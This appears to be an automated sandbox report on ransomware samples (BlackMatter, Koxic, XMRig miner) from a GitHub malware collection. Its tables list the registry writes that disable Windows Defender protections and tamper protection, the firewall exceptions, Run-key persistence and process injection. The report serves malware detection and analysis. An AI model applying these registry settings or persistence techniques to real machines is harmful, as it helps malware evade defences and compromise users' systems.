Analysis Overview
Threat Level: Known bad
The file https://github.com/Pyran1/MalwareDatabase/tree/master/Ransomware was found to be: Known bad.
Malicious Activity Summary
xmrig
Blackmatter family
Koxic family
Modifies firewall policy service
Xmrig family
Modifies Windows Defender DisableAntiSpyware settings
Koxic
BlackMatter Ransomware
Modifies Windows Defender Real-time Protection settings
XMRig Miner payload
Renames multiple (615) files with added filename extension
Drops file in Drivers directory
Disables taskbar notifications via registry modification
Executes dropped EXE
Checks computer location settings
Modifies file permissions
Drops startup file
Windows security modification
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Opens file in notepad (likely ransom note)
Scheduled Task/Job: Scheduled Task
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Modifies Control Panel
Uses Task Scheduler COM API
Enumerates system info in registry
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-26 05:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-26 05:03
Reported
2025-02-26 05:21
Platform
win10v2004-20250217-en
Max time kernel
1039s
Max time network
1039s
Command Line
Signatures
BlackMatter Ransomware
Blackmatter family
Koxic
Koxic family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383a = "C:\\Users\\Admin\\Downloads\\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe:*:enabled:@shell32.dll,-1" | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
Xmrig family
xmrig
Renames multiple (615) files with added filename extension
XMRig Miner payload
Disables taskbar notifications via registry modification
Drops file in Drivers directory
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\rtksmbs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\serverpatch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\zqawds.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pUKKXbtdAP.url | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\pukkxbtdap.url | C:\Windows\system32\taskmgr.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\309083e1-c7ce-4856-8974-714ff3572443\\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe\" --AutoStart" | C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\apo5 = "C:\\Program Files (x86)\\win\\msn.exe" | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MuyRestore = "C:\\Users\\Admin\\AppData\\Roaming\\\\MuyRestore.exe" | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Sets desktop wallpaper using registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5152 set thread context of 3592 | N/A | C:\Users\Admin\appdata\roaming\serverpatch.exe | C:\Windows\explorer.exe |
| PID 5020 set thread context of 4268 | N/A | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | C:\Windows\explorer.exe |
| PID 3060 set thread context of 1468 | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE |
| PID 4316 set thread context of 5660 | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\win | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| File created | C:\Program Files (x86)\win\msn.exe | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| File opened for modification | C:\Program Files (x86)\win\msn.exe | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "846" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "813" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
